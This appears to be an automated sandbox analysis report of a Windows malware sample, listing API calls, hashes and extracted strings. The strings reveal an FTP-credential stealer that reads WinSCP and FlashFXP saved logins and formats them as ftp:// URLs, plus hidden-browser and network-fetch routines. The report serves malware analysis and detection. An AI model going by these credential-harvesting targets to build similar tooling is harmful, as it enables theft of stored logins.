                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040476D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocCloseEnumHeapOpen
                                                                                                                                                                                                  • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                                                                                                                                                                                                  • API String ID: 3497950970-285550827
                                                                                                                                                                                                  • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                  • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                                                                                                                                                                                                  • String ID: hOA
                                                                                                                                                                                                  • API String ID: 1355009786-3485425990
                                                                                                                                                                                                  • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                                                                                                                                                                                                  • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountTick
                                                                                                                                                                                                  • String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                                                                                                                                                                                                  • API String ID: 536389180-1762329985
                                                                                                                                                                                                  • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                                                                                                                                                                                                  • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00409359
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00409362
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004093B8
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: String$Free$Alloc$CharLower
                                                                                                                                                                                                  • String ID: http:$javascript$+@
                                                                                                                                                                                                  • API String ID: 1987340527-3375436608
                                                                                                                                                                                                  • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                                                                                                                                                                                                  • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                  • String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
                                                                                                                                                                                                  • API String ID: 3472027048-1081452883
                                                                                                                                                                                                  • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                                                                                                                                                                                                  • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                                                  • String ID: _self$http$+@
                                                                                                                                                                                                  • API String ID: 1473721057-3317424838
                                                                                                                                                                                                  • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                                                                                                                                                                                                  • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                                                                                                                                                                                                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open$CloseQueryValue
                                                                                                                                                                                                  • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                                                                                                                                                                                                  • API String ID: 3546245721-1332223170
                                                                                                                                                                                                  • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                                                                                                                                                                                                  • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                                                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                                                                                                                                                                                                  • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                                                                                                                                                                                                    • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                                                                                                                                                                                                    • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                                                                                                                                                                                                    • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                                                                                                                                                                                                  • String ID: Shell_TrayWnd$eventConn
                                                                                                                                                                                                  • API String ID: 2141107913-3455059086
                                                                                                                                                                                                  • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                                                                                                                                                                                                  • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                                                                                                                                                                                                  • StrStrIA.SHLWAPI(?,?), ref: 00404913
                                                                                                                                                                                                  • StrStrIA.SHLWAPI(?,?), ref: 00404925
                                                                                                                                                                                                  • StrStrIA.SHLWAPI(?,?), ref: 00404935
                                                                                                                                                                                                  • StrStrIA.SHLWAPI(?,?), ref: 00404947
                                                                                                                                                                                                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                  • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                                                                                                                                                                                                  • API String ID: 1635188419-1322549247
                                                                                                                                                                                                  • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                                                                                                                                                                                                  • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00407387
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0040738D
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                                                                                                                                                                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3166187867-0
                                                                                                                                                                                                  • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                                                                                                                                                                                                  • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: http$+@
                                                                                                                                                                                                  • API String ID: 0-4127549746
                                                                                                                                                                                                  • Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                                                                                                                                                                                                  • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnvironmentExpandFolderOpenPathStrings
                                                                                                                                                                                                  • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                                                                                                                                                                                                  • API String ID: 1994525040-4055253781
                                                                                                                                                                                                  • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                                                                                                                                                                                                  • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004099EB
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004099F9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                  • String ID: </domain>$</url>$<domain>$<url>$http://
                                                                                                                                                                                                  • API String ID: 2525500382-924421446
                                                                                                                                                                                                  • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                                                                                                                                                                                                  • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(753CF6A0), ref: 00408F82
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                                                                                  • Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                                                                                                                                                                                                  • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 0040ADA4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
